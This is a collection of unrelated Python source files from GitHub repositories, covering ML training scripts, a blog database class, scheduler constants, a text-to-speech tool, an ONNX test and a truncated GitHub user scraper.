\"2016-03-01\"\ndateTo = \"2016-03-10\"\n\n# 取出車輛的加油地點,有打錨點\nfor idxCar in range(len(listCar)):\n # print(idxCar, listCar[idxCar][0])\n tmpDfSql = dfSql.where(dfSql[\"CarNo\"] == listCar[idxCar][0]).persist()\n # tmpDfSql.select('StdNo').distinct().collect()\n # tmpDfSql.select(\"Qty\").toPandas().sum()\n # tmpDfSql.where((tmpDfSql[\"TDate\"] >= dateFrom) & (tmpDfSql[\"TDate\"] <= dateTo)).collect()\n # tmpDfSql.select(tmpDfSql[\"TDate\"]).distinct().show()\n # tmpDfSql.select(tmpDfSql[\"TDate\"]).distinct().orderBy(tmpDfSql[\"TDate\"]).show()\n\n\n","repo_name":"marsywhuang/gasStation","sub_path":"parser215.py","file_name":"parser215.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"17466219942","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: mnist-disturb.py\n# Author: Yuxin Wu \n\nimport numpy as np\nimport tensorflow as tf\nimport os, sys\nimport argparse\n\nfrom tensorpack import *\nfrom disturb import DisturbLabel\n\nimport imp\nmnist_example = imp.load_source('mnist_example',\n os.path.join(os.path.dirname(__file__), '..', 'mnist-convnet.py'))\nget_config = mnist_example.get_config\n\ndef get_data():\n dataset_train = BatchData(DisturbLabel(dataset.Mnist('train'), args.prob), 128)\n dataset_test = BatchData(dataset.Mnist('test'), 256, remainder=True)\n return dataset_train, dataset_test\nmnist_example.get_data = get_data\n\nIMAGE_SIZE = 28\n\nclass Model(mnist_example.Model):\n def _build_graph(self, input_vars):\n image, label = input_vars\n image = tf.expand_dims(image, 3)\n\n with argscope(Conv2D, kernel_shape=5, nl=tf.nn.relu):\n logits = (LinearWrap(image) # the starting brace is only for line-breaking\n .Conv2D('conv0', out_channel=32, padding='VALID')\n .MaxPooling('pool0', 2)\n .Conv2D('conv1', out_channel=64, padding='VALID')\n .MaxPooling('pool1', 2)\n .FullyConnected('fc0', 512, nl=tf.nn.relu)\n .FullyConnected('fc1', out_dim=10, nl=tf.identity)())\n prob = tf.nn.softmax(logits, name='prob')\n\n wrong = symbolic_functions.prediction_incorrect(logits, label)\n add_moving_summary(tf.reduce_mean(wrong, name='train_error'))\n\n cost = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, label)\n cost = tf.reduce_mean(cost, name='cross_entropy_loss')\n wd_cost = tf.mul(1e-5, regularize_cost('fc.*/W', tf.nn.l2_loss),\n name='regularize_loss')\n add_moving_summary(cost, wd_cost)\n\n self.cost = tf.add_n([wd_cost, cost], name='cost')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')\n parser.add_argument('--load', help='load model')\n parser.add_argument('--prob', help='disturb prob', type=float, required=True)\n args = parser.parse_args()\n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n config = get_config()\n if args.load:\n config.session_init = SaverRestore(args.load)\n QueueInputTrainer(config).train()\n\n","repo_name":"jxwufan/NLOR_A3C","sub_path":"tensorpack/examples/DisturbLabel/mnist-disturb.py","file_name":"mnist-disturb.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"6"} +{"seq_id":"31355281666","text":"class ALumno:\n nombre = None\n nota = None\n\n def __init__(self,nombre, nota):\n self.nombre = nombre\n self.nota = nota\n def imprimirNota(self):\n print(self.nota)\n def EstaAprobado(self):\n if (self.nota < 4):\n return False\n else:\n return True\n \nALumno = ALumno('Alex',8)\nALumno.imprimirNota()\nprint(ALumno.EstaAprobado())\n ","repo_name":"Franjj08/Python_BootCampus","sub_path":"ej6.2.py","file_name":"ej6.2.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21729775724","text":"import random\r\n\r\nparam_1 = random.randint(1,10)\r\nprint(param_1)\r\n\r\ndef game():\r\n while True:\r\n guess = input('Guess any number from 1 till 10: ')\r\n print('You have chosen ', guess)\r\n if 0 < int(guess) < 11 and int(guess) == param_1:\r\n print('Gongratulation!')\r\n break\r\n else:\r\n print('You are wrong! Try one more time!')\r\n continue\r\nprint(game())","repo_name":"TheGurtang/Python","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42424325073","text":"import sqlite3\nfrom Post import Post\nfrom Comment import Comment\n\n\nclass BlogDatabase:\n def __init__(self, app):\n self.__app = app\n\n def connect(self):\n if not hasattr(self, '__db_connection'):\n db_connection = sqlite3.connect(self.__app.config['DATABASE_PATH'])\n db_connection.row_factory = sqlite3.Row\n self.__db_connection = db_connection\n self.__cursor = self.__db_connection.cursor()\n\n def close_connection(self):\n if hasattr(self, '__db_connection'):\n self.__db_connection.close()\n\n def execute_script(self, script_name):\n with self.__app.open_resource('db/sql/' + script_name, mode='r') as script_file:\n self.__cursor.executescript(script_file.read())\n\n @staticmethod\n def __create_post_from_db_row(row):\n return Post(row['post_id'], row['title'], row['short_description'], row['text'], row['publication_date'], row['img_url'])\n\n def get_posts(self):\n sql = 'SELECT post_id, title, short_description, text, publication_date, img_url FROM post'\n self.__cursor.execute(sql)\n post_rows = self.__cursor.fetchall()\n posts = []\n for post_row in post_rows:\n post = self.__create_post_from_db_row(post_row)\n posts.append(post)\n return posts\n\n def get_post_by_id(self, post_id):\n sql = 'SELECT post_id, title, short_description, text, publication_date, img_url FROM post WHERE post_id = ?'\n self.__cursor.execute(sql, (post_id,))\n post_row = self.__cursor.fetchone()\n if post_row:\n post = self.__create_post_from_db_row(post_row)\n return post\n return None\n\n @staticmethod\n def __create_comment_from_db_row(row):\n return Comment(row['comment_id'], row['post_id'], row['text'])\n\n def get_comments_by_post_id(self, post_id):\n sql = 'SELECT comment_id, post_id, text FROM comment WHERE post_id = ?'\n self.__cursor.execute(sql, (post_id,))\n comment_rows = self.__cursor.fetchall()\n comments = []\n for comment_row in comment_rows:\n comment = self.__create_comment_from_db_row(comment_row)\n comments.append(comment)\n return comments\n\n def add_comment_to_post_by_post_id(self, comment_text, post_id):\n sql = 'INSERT INTO comment (post_id, text) VALUES (?, ?)'\n self.__db_connection.commit()","repo_name":"fedosovmu/BlogFlask","sub_path":"BlogDatabase.py","file_name":"BlogDatabase.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26664212255","text":"from abc import abstractmethod\n\nfrom ir.ir_exceptions import LabelsNotAvailable\nfrom ir.ir_operations import IROp, IROpOptions\nfrom ir.ir_parameters import IRNumPar\n\nfrom sklearn.ensemble import IsolationForest\nfrom sklearn.neighbors import LocalOutlierFactor\nfrom sklearn.svm import OneClassSVM\nimport numpy as np\nimport pandas as pd\n\n\nclass IROutliersDetection(IROp):\n def __init__(self, name, parameters = None, model = None):\n super(IROutliersDetection, self).__init__(name,parameters if parameters is not None else [])\n if parameters!=None:\n self._model = model(**{v.name: v.value for v in parameters})\n self.labels = None\n\n def parameter_tune(self, dataset):\n pass\n\n def set_model(self, result):\n if 'transformed_ds' in result:\n dataset = result['transformed_ds']\n elif 'new_dataset' in result:\n dataset = result['new_dataset']\n else:\n dataset = result['original_dataset'].ds\n labels = result['labels']\n self.parameter_tune(dataset)\n for p,v in self.parameters.items():\n self._model.__setattr__(p,self.parameters[p].value)\n self._param_setted = True\n\n def get_labels(self):\n if self.labels is None:\n raise LabelsNotAvailable\n return self.labels\n\n #TDB cosa deve restituire questa funzione?\n def run(self, result, session_id, **kwargs):\n if not self._param_setted:\n self.set_model(result)\n\n if 'transformed_ds' in result:\n dataset = result['transformed_ds']\n elif 'new_dataset' in result:\n dataset = result['new_dataset']\n else:\n dataset = result['original_dataset'].ds\n if self.__class__.__name__!=\"IROutliersDetection\":\n print('PARAMETERS', self.parameters)\n result['predicted_outliers'] = self._model.fit_predict(dataset)\n mask_outliers = result['predicted_outliers'] == -1\n result['outliers_dataset'] = pd.DataFrame(dataset.values[mask_outliers, :])\n mask = result['predicted_outliers'] != -1\n result['noOutliers_dataset'] = pd.DataFrame(dataset.values[mask, :])\n result['labels'] = mask\n self._param_setted = False\n return result\n else:\n # TODO: è sbagliato, va sistemato\n result = IROneClassSVM().run(result, session_id)\n return result\n\n\nclass IRIsolationForest(IROutliersDetection):\n def __init__(self):\n super(IRIsolationForest, self).__init__(\"isolationForest\",\n [IRNumPar(\"contamination\", \"auto\", \"float\", 0, 0.5, 0.1)], # TODO: if I want to pass a list of values?\n IsolationForest)\n self._param_setted = False\n\n def parameter_tune(self, dataset):\n pass\n\nclass IRLocalOutlierFactor(IROutliersDetection):\n def __init__(self):\n super(IRLocalOutlierFactor, self).__init__(\"localOutlierFactor\",\n [IRNumPar(\"contamination\", \"auto\", \"float\", 0, 0.5, 0.1)], # TODO: if I want to pass a list of values?\n LocalOutlierFactor)\n self._param_setted = False\n\n def parameter_tune(self, dataset):\n pass\n\nclass IROneClassSVM(IROutliersDetection):\n def __init__(self):\n super(IROneClassSVM, self).__init__(\"oneClassSVM\",\n [IRNumPar(\"nu\", 0.01, \"float\", 0, 0.5, 0.1)], # TODO: if I want to pass a list of values?\n OneClassSVM)\n self._param_setted = False\n\n def parameter_tune(self, dataset):\n pass\n\nclass IRGenericOutliersDetection(IROpOptions):\n def __init__(self):\n super(IRGenericOutliersDetection, self).__init__([IROutliersDetection('outliersDetection'),IRIsolationForest(), IRLocalOutlierFactor(), IROneClassSVM()], \"oneClassSVM\")","repo_name":"DEIB-GECO/DSBot","sub_path":"DSBot/ir/impl/outliersDetection.py","file_name":"outliersDetection.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43468959610","text":"\"\"\"\nAll module related constants definitions in one place. It allows to modify values without changing the underlying code.\nHaving them at one place makes easier to manage. Also prevents redundant strings or numeric values.\n\n1. CONFIG_FILE = Scheduler configuration file path. This allows to place the configurations to different directory.\n2. The environment key should be used to acquire related configurations. Valid values [ENV_DEV, ENV_TEST, ENV_PROD]\n3. Information messages key should start from MSG\n4. Exception messages key should start from MSG_EX\n5. Error messages key should start from ERR_MSG\n6. All operations performed by scheduler, the key should start from OPERATION\n7. All statuses assigned by scheduler, the key should start from STATUS\n8. All default values used for scheduler operations, the key should start from DEFAULT\n\n\"\"\"\n\n# configs\nCONFIG_FILE = \"/config.yaml\"\nENV_DEV = \"DEV\"\nENV_TEST = \"TEST\"\nENV_PROD = \"PROD\"\n\n# messages\n# messages > Info\nMSG_CONFIG_LOADING = \"\\n(i) Loading scheduler configurations...\"\nMSG_CONFIG_LOADED = \"(i) Scheduler configurations loaded!\\n\"\nMSG_FILES_DOWNLOADED = \"(i) Files downloaded\"\nMSG_FILES_DOWNLOADING = \"\\n(i) Files downloading. Please wait...\"\nMSG_FILES_TRANSFERRING = \"\\n(i) Transferring files, please wait...\"\nMSG_FILES_TRANSFERRED = \"(i) Files transfer complete \"\nMSG_FILES_UPLOADED = \"(i) Files uploaded\"\nMSG_FILES_UPLOADING = \"\\n(i) Files uploading. Please wait...\"\nMSG_JOB_SCHEDULED = \"(i) Job has been scheduled and ready to start.\"\nMSG_NEXT_RUN_SCHEDULE = \"(i) Next job to run at {}, which is {} seconds from now\"\nMSG_JOB_STARTED = \"Scheduled jobs started and will run on schedule. (Print Estimated Time to Run (ETR)= {})\"\nMSG_SHUTTING_DOWN_SCHEDULER = \"(i) Shutting down scheduler...\"\nMSG_WAIT_UNTIL_SAFE_SHUTDOWN = \"(i) Waiting until safely shutdown. \" \\\n \"NOTE: This operation will complete all pending jobs and then shutdown.\"\nMSG_SHUTDOWN_SCHEDULER_RUNNING_ALL = \"(i) Running all pending jobs before shutting down scheduler...\"\nMSG_SCHEDULER_SHUTDOWN_COMPLETE = \"(i) Scheduler shutdown complete.\"\nMSG_FORCE_STOP = \"(i) Force stopping scheduler...\"\nMSG_SCHEDULER_INTERRUPTED = \"*** (><) Scheduler interrupted, trying to safely shutdown. \" \\\n \"All pending jobs will be executed immediately.\"\n# messages > exception\nMSG_EX_ILLEGAL_DOWNLOADER = \"(EX) Illegal downloader argument\"\nMSG_EX_ILLEGAL_UPLOADER = \"(EX) Illegal uploader argument\"\nMSG_EX_ILLEGAL_NOTIFIER = \"(EX) Illegal notifier argument\"\nMSG_EX_ILLEGAL_JOB = \"(EX) Illegal job argument\"\nMSG_EX_INVALID_SCHEDULE_CONFIG = \"(EX) Either 'every' or 'at' should be provided, \" \\\n \"not both. Job rejected due to invalid schedule configurations.\"\n# messages > Error\nERR_MSG_INVALID_CONFIGS = \"(X) *** Invalid configurations present, \" \\\n \"please resolve errors to be able to start scheduler ***\"\nERR_MSG_STARTUP = \"(X) *** Please fix configurations to initiate scheduler startup.\"\nERR_MSG_DIR_EMPTY = \"(X) Source and target directories are mandatory\"\nERR_MSG_ERR_DIR_EMPTY = \"(X) Error and output directories are mandatory\"\nERR_MSG_REMOTE_CFG_EMPTY = \"(X) Source host, username, secret are mandatory for remote\"\nERR_MSG_SCHEDULE_ACTION_EMPTY = \"(X) Schedule and action are mandatory\"\nERR_MSG_SMTP_INVALID = \"(X) Invalid SMTP or Email configurations\"\nERR_MSG_SCHEDULE_INVALID = \"(X) Invalid schedule configurations. Value for both EVERY and AT are not allowed,\" \\\n \" it should be either one.\"\nERR_MSG_TIME_UNIT_EMPTY = \"(X) At least one Time Unit should be present.\"\n# messages > Audit\n# messages > Audit > operation\nOPERATION_CONFIGURATION = \"Configuration\"\nOPERATION_CREATE = \"Create\"\nOPERATION_UPDATE = \"Update\"\nOPERATION_DOWNLOAD = \"Download\"\nOPERATION_UPLOAD = \"Upload\"\nOPERATION_FILE_DELETE = \"File-Delete\"\nOPERATION_FILE_TRANSFER = \"File-Transfer\"\nOPERATION_NOTIFICATION = \"Notification\"\nOPERATION_SCHEDULE = \"Scheduler\"\nOPERATION_START_JOBS = \"Start-Jobs\"\nOPERATION_SHUTDOWN = \"Shutdown\"\n\n# messages > Audit > status\nSTATUS_LOADED = \"Loaded\"\nSTATUS_LOADING = \"Loading\"\nSTATUS_INVALID = \"Invalid\"\nSTATUS_PROCESSING = \"Processing\"\nSTATUS_COMPLETE = \"Complete\"\nSTATUS_SCHEDULING = \"Scheduling\"\nSTATUS_SCHEDULED = \"Scheduled\"\nSTATUS_STARTING = \"Starting\"\nSTATUS_STARTED = \"Started\"\nSTATUS_WAITING = \"Waiting\"\nSTATUS_INTERRUPTED = \"Interrupted\"\n\n# default configs\nDEFAULT_SCHEDULER_ACTION = \"create\"\nDEFAULT_PULSE = 5\nDEFAULT_SFTP_PORT = 22\n\n# constants\nC_TIME_PARTS = {\"hour\", \"minute\", \"second\"}\nCREATE = 'CREATE'\nUPDATE = 'UPDATE'\n\n# email notifier\nSUBJECT = \"Subject\"\nFROM = \"From\"\nTO = \"To\"\nDATE = \"Date\"\nCONTENT_DISPOSITION_K = \"Content-Disposition\"\nCONTENT_DISPOSITION_V = 'attachment; filename=\"%s\"'\n\nSECOND = 'second'\nSECONDS = 'seconds'\nMINUTE = 'minute'\nMINUTES = 'minutes'\nHOUR = 'hour'\nHOURS = 'hours'\n\nDAY = 'day'\n\nMONDAY = 'monday'\nTUESDAY = 'tuesday'\nWEDNESDAY = 'wednesday'\nTHURSDAY = 'thursday'\nFRIDAY = 'friday'\nSATURDAY = 'saturday'\nSUNDAY = 'sunday'\n","repo_name":"adityapant1286/Scheduler","sub_path":"Scheduler/utils/Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17525800791","text":"# case 01 Pcn10 假想的互联网公司访问量预测模型, 多项式拟合\n\nimport os\nimport scipy as sp\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import fsolve\n\n# 案例1\n# 互联网公司MLAAS,通过HTTP向用户推销机器学习算法服务,提供优质服务需要更好的基础设施。\n# 基础设施多了会浪费钱,少了服务质量就不能保证会导致赔钱。\n# 问题:何时会达到基础设施的服务极限,目前估计的极限是: 100000请求/小时\n# 源数据:../data/web_traffic.tsv: 小时, 访问量\n\n# all examples will have three classes in this file\ncolors = ['g', 'k', 'b', 'm', 'r']\nlinestyles = ['-', '-.', '--', ':', '-']\n\n\n# 公共绘图函数\ndef plot_models(x, y, models, fname, mx=None, ymax=None, xmin=None):\n plt.clf()\n plt.scatter(x, y, s=10)\n plt.title(\"Web traffic over the last month\")\n plt.xlabel(\"Time\")\n plt.ylabel(\"Hits/hour\")\n plt.xticks([w * 7 * 24 for w in range(10)], ['week %i' % w for w in range(10)])\n\n if models:\n if mx is None:\n mx = sp.linspace(0, x[-1], 1000)\n for model, style, color in zip(models, linestyles, colors):\n # print \"Model:\",model\n # print \"Coeffs:\",model.coeffs\n plt.plot(mx, model(mx), linestyle=style, linewidth=2, c=color)\n\n plt.legend([\"d=%i\" % m.order for m in models], loc=\"upper left\")\n\n plt.autoscale(tight=True)\n plt.ylim(ymin=0)\n if ymax:\n plt.ylim(ymax=ymax)\n if xmin:\n plt.xlim(xmin=xmin)\n plt.grid(True, linestyle='-', color='0.75')\n plt.savefig(fname)\n\n\n# 误差计算函数: 对于一个训练好的模型f,按照如下公式计算其误差,f(x)表示使用模型后的结果, sp.sum((f(x) - y) ** 2) 为所有误差平方和\n# f(x): scipy提供的向量化函数\ndef error(f, x, y):\n return sp.sum((f(x) - y) ** 2)\n\n\n# 0. 加载数据, 初始化向量\ndata_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"..\", \"data\")\ndata = sp.genfromtxt(os.path.join(data_dir, \"web_traffic.tsv\"), delimiter=\"\\t\")\nprint(data[:10])\nx = data[:, 0] # 小时信息\ny = data[:, 1] # 某个小时的Web访问数\nprint(\"Number of invalid entries:\", sp.sum(sp.isnan(y))) # 无效数据\n\n# 1. 去掉无效数据后,绘制当前数据的图形\nx = x[~sp.isnan(y)] # 只取合法数据\ny = y[~sp.isnan(y)] # 只取合法数据\nplot_models(x, y, None, os.path.join(\"..\", \"1400_01_01.png\"))\n\n# 2. 创建模型,做1阶、2阶、3阶、10阶、100阶拟合并绘图\nfp1, res, rank, sv, rcond = sp.polyfit(x, y, 1, full=True) # fp1 为模型参数\nprint(\"Model parameters: %s\" % fp1)\nprint(\"Error of the model:\", res)\nf1 = sp.poly1d(fp1)\nf2 = sp.poly1d(sp.polyfit(x, y, 2))\nf3 = sp.poly1d(sp.polyfit(x, y, 3))\nf10 = sp.poly1d(sp.polyfit(x, y, 10))\nf100 = sp.poly1d(sp.polyfit(x, y, 100))\nplot_models(x, y, [f1], os.path.join(\"..\", \"1400_01_02.png\"))\nplot_models(x, y, [f1, f2], os.path.join(\"..\", \"1400_01_03.png\"))\nplot_models(x, y, [f1, f2, f3, f10, f100], os.path.join(\"..\", \"1400_01_04.png\"))\n\n# 3. 依据已有数据在3.5周左右出现大的拐点进行调整并设计模型\ninflection = int(3.5 * 7 * 24)\nxa = x[:inflection]\nya = y[:inflection]\nxb = x[inflection:]\nyb = y[inflection:]\nfa = sp.poly1d(sp.polyfit(xa, ya, 1))\nfb = sp.poly1d(sp.polyfit(xb, yb, 1))\nplot_models(x, y, [fa, fb], os.path.join(\"..\", \"1400_01_05.png\")) # 相比其他复查模型,最后一周更符合该直线模型,更符合未来数据\n\nprint(\"Errors for the complete data set:\")\nfor f in [f1, f2, f3, f10, f100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, x, y)))\n\nprint(\"Errors for only the time before inflection point\")\nfor f in [f1, f2, f3, f10, f100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, xa, ya)))\n\nprint(\"Errors for only the time after inflection point\")\nfor f in [f1, f2, f3, f10, f100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, xb, yb)))\n\nprint(\"Error inflection=%f\" % (error(fa, xa, ya) + error(fb, xb, yb)))\n\n# 4. 预测 extrapolating into the future, 对于10阶、100阶两种情况从图中看出及预测效果非常差(过拟合导致)\nplot_models(\n x, y, [f1, f2, f3, f10, f100], os.path.join(\"..\", \"1400_01_06.png\"),\n mx=sp.linspace(0 * 7 * 24, 6 * 7 * 24, 100),\n ymax=10000, xmin=0 * 7 * 24)\n\n# 5. 仅仅用拐点后的数据做模型训练\nprint(\"Trained only on data after inflection point\")\nfb1 = fb\nfb2 = sp.poly1d(sp.polyfit(xb, yb, 2))\nfb3 = sp.poly1d(sp.polyfit(xb, yb, 3))\nfb10 = sp.poly1d(sp.polyfit(xb, yb, 10))\nfb100 = sp.poly1d(sp.polyfit(xb, yb, 100))\n\nprint(\"Errors for only the time after inflection point\")\nfor f in [fb1, fb2, fb3, fb10, fb100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, xb, yb)))\n\nplot_models(\n x, y, [fb1, fb2, fb3, fb10, fb100], os.path.join(\"..\", \"1400_01_07.png\"),\n mx=sp.linspace(0 * 7 * 24, 6 * 7 * 24, 100),\n ymax=10000, xmin=0 * 7 * 24)\n\n# 6. 从给定数据中分离出训练数据和测试数据, separating training from testing data\nfrac = 0.3\nsplit_idx = int(frac * len(xb))\nshuffled = sp.random.permutation(list(range(len(xb))))\ntest = sorted(shuffled[:split_idx])\ntrain = sorted(shuffled[split_idx:])\nfbt1 = sp.poly1d(sp.polyfit(xb[train], yb[train], 1))\nfbt2 = sp.poly1d(sp.polyfit(xb[train], yb[train], 2))\nfbt3 = sp.poly1d(sp.polyfit(xb[train], yb[train], 3))\nfbt10 = sp.poly1d(sp.polyfit(xb[train], yb[train], 10))\nfbt100 = sp.poly1d(sp.polyfit(xb[train], yb[train], 100))\n\nprint(\"Test errors for only the time after inflection point\")\nfor f in [fbt1, fbt2, fbt3, fbt10, fbt100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, xb[test], yb[test])))\n\nplot_models(\n x, y, [fbt1, fbt2, fbt3, fbt10, fbt100], os.path.join(\"..\", \"1400_01_08.png\"), # 该图具有很大随机性, 取决于shuffled\n mx=sp.linspace(0 * 7 * 24, 6 * 7 * 24, 100),\n ymax=10000, xmin=0 * 7 * 24)\n\n# 7. 通过比较,fbt2的误差最小,选定fbt2作为我们的模型,对未来进行预测,看访问量到达100000会在什么时间点发生\nprint(fbt2)\nprint(fbt2 - 100000)\nreached_max = fsolve(fbt2 - 100000, 800) / (7 * 24)\nprint(\"100,000 hits/hour expected at week %f\" % reached_max[0])\n","repo_name":"radiumweilei/building-machine-learning-systems-with-python","sub_path":"1400OS_01_Codes/code/analyze_webstats.py","file_name":"analyze_webstats.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"16409187060","text":"from tkinter import *\r\nimport tkinter.messagebox as msgbox\r\nimport tkinter.filedialog as filedlg\r\nimport os\r\nimport pyttsx3\r\nfrom pydub import AudioSegment\r\nimport threading\r\n\r\ntxtfile = \"\"\r\nwindow = Tk()\r\npathlabel = Label(window, text=\"...\")\r\n\r\n'''\r\nMP3转换接口:\r\nuse_by_txt(使用一个txt所在的地址直接调用,然后生成txt对应的MP3文件)\r\nuse_by_identity是一个独立程序,如果你在当前窗口调用,调用前记得注释掉main\r\n'''\r\n\r\n\r\n\r\n\r\ndef fileFunc():\r\n default_dir = \"文件路径\"\r\n global txtfile\r\n global pathlabel\r\n txtfile = filedlg.askopenfilename(title=\"选择文件\", initialdir=(os.path.expanduser(default_dir)))\r\n (path, fname) = os.path.split(txtfile)\r\n pathlabel[\"text\"] = fname\r\n\r\ndef converThreadFunc(content):\r\n outfile = \"out.aiff\"\r\n tts = pyttsx3.init()\r\n tts.save_to_file(content, outfile)\r\n tts.runAndWait()\r\n\r\ndef convertFunc():\r\n if len(txtfile) == 0:\r\n msgbox.showinfo(\"提示\", \"请先选择文本文件\")\r\n return\r\n content = open(txtfile, \"r\",encoding='ansi').read()\r\n if len(content)==0:\r\n msgbox.showinfo(\"提示\", \"文本文件没有内容,转换终止,不输出语音文件\")\r\n return\r\n t1 = threading.Thread(target=converThreadFunc, args=(content,))\r\n t1.start()\r\n t1.join()\r\n outfile = \"out.aiff\"\r\n AudioSegment.from_file(outfile).export(\"out.mp3\", format=\"mp3\")\r\n msgbox.showinfo(\"提示\", \"转换成功,程序目录下的out.mp3就是最终的语音文件:%s\" % os.getcwd())\r\n os.system(\"open '%s'\" % os.getcwd())\r\n\r\ndef use_by_identity():\r\n window.title(\"TTS-文本转换语音\")\r\n window.geometry(\"320x320+100+100\")\r\n filebtn = Button(window, text=\"选择文本文件\", command=fileFunc)\r\n convertbtn = Button(window, text=\"转换成语音\", command=convertFunc)\r\n filebtn.place(x=10, y=10)\r\n pathlabel.place(x=10, y=40)\r\n convertbtn.place(x=10, y=80)\r\n window.mainloop()\r\n\r\ndef use_by_txt(txtpath):\r\n if len(txtpath) == 0:\r\n msgbox.showinfo(\"提示\", \"请先选择文本文件\")\r\n return\r\n content = open(txtpath, \"r\",encoding='ansi').read()\r\n if len(content)==0:\r\n msgbox.showinfo(\"提示\", \"文本文件没有内容,转换终止,不输出语音文件\")\r\n return\r\n converThreadFunc(content)\r\n outfile = \"out.aiff\"\r\n AudioSegment.from_file(outfile).export(\"tlj.mp3\", format=\"mp3\")\r\n #msgbox.showinfo(\"提示\", \"转换成功,程序目录下的tlj.mp3就是最终的语音文件:%s\" % os.getcwd())\r\n#use_by_identity()\r\n#if __name__==\"__main__\":\r\n #main()","repo_name":"masterfzb/AIreader","sub_path":"use_to_wave.py","file_name":"use_to_wave.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"73372248507","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# @Date : Apr-12-20 07:36\r\n# @Author : Your Name (you@example.org)\r\n# @Link : http://example.org\r\n\r\nimport nonebot\r\nfrom nonebot import on_command, CommandSession\r\n\r\n\r\n@on_command('info', aliases=(\"信息\"))\r\nasync def info(session: CommandSession):\r\n bot = session.bot\r\n bot = nonebot.get_bot()\r\n stripped_arg = session.current_arg_text.strip()\r\n\r\n message = \"我是布宝,真正懂你的崩坏3机器人。\"\r\n\r\n await session.send(message)\r\n","repo_name":"KellyHwong/bronya-bot","sub_path":"bronya/plugins/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1293603691","text":"import numpy as np\nimport onnx\n\nfrom tests.tools import expect\n\n\nclass Det:\n @staticmethod\n def export_2d(): # type: () -> None\n node = onnx.helper.make_node(\n 'Det',\n inputs=['x'],\n outputs=['y'],\n )\n\n x = np.arange(4).reshape(2, 2).astype(np.float32)\n y = np.linalg.det(x) # expect -2\n expect(node, inputs=[x], outputs=[y], name='test_det_2d')\n\n @staticmethod\n def export_nd(): # type: () -> None\n node = onnx.helper.make_node(\n 'Det',\n inputs=['x'],\n outputs=['y'],\n )\n\n x = np.array([[[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]]]).astype(\n np.float32\n )\n y = np.linalg.det(x) # expect array([-2., -3., -8.])\n expect(node, inputs=[x], outputs=[y], name='test_det_nd')\n\n\nif __name__ == '__main__':\n Det.export_2d()\n Det.export_nd()\n","repo_name":"gglin001/onnx-jax","sub_path":"tests/node/test_det.py","file_name":"test_det.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"37290621405","text":"import logging\nimport sys\n\n\ndef config(logger=None,\n name=None,\n level=logging.INFO,\n format=\"[%(asctime)s]:%(levelname)s:%(name)s:%(message)s\",\n propagate=True):\n if not logger or isinstance(logger, str):\n logger = logging.getLogger(logger)\n set_logger_level(logger=logger, level=level)\n if propagate is not None:\n logger.propagate = propagate\n if isinstance(name, str):\n logger.name = name\n if format is not None:\n if not logger.handlers:\n log_handler = logging.StreamHandler(sys.stderr)\n logger.addHandler(log_handler)\n for log_handler in logger.handlers:\n log_handler.setFormatter(logging.Formatter(format, None))\n\n\ndef set_logger_level(logger=None, level=logging.INFO):\n if not logger:\n logger = logging.getLogger()\n elif isinstance(logger, str):\n logger = logger.getLogger(logger)\n logger.setLevel(get_logging_level(level))\n\n\ndef get_logging_level(level):\n if isinstance(level, int):\n logging_level = level\n else:\n logging_level = logging.getLevelName(level)\n return logging_level\n","repo_name":"miacro/pyconfigmanager","sub_path":"pyconfigmanager/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39582872745","text":"# Members: Liming Zheng, Juntong liu, Pengkai Fang\n\n# In the user.py, it scrape the user page content\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport os\nimport csv\nimport pandas as pd\n\n\nclass User:\n def __init__(self, users):\n # user list with repeated entries\n self.__users = users\n # scraped users information\n self.users = {}\n\n @staticmethod\n def __user_has_twitter(user):\n if requests.get('https://twitter.com/' + user).status_code == 200:\n return 1\n else:\n return 0\n\n def to_CSV(self):\n # write header\n filename = os.path.join('users.csv')\n if not os.path.isfile(filename):\n with open(filename, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=['user', 'total_pr', 'user_has_twitter', 'public_repos', 'followers', 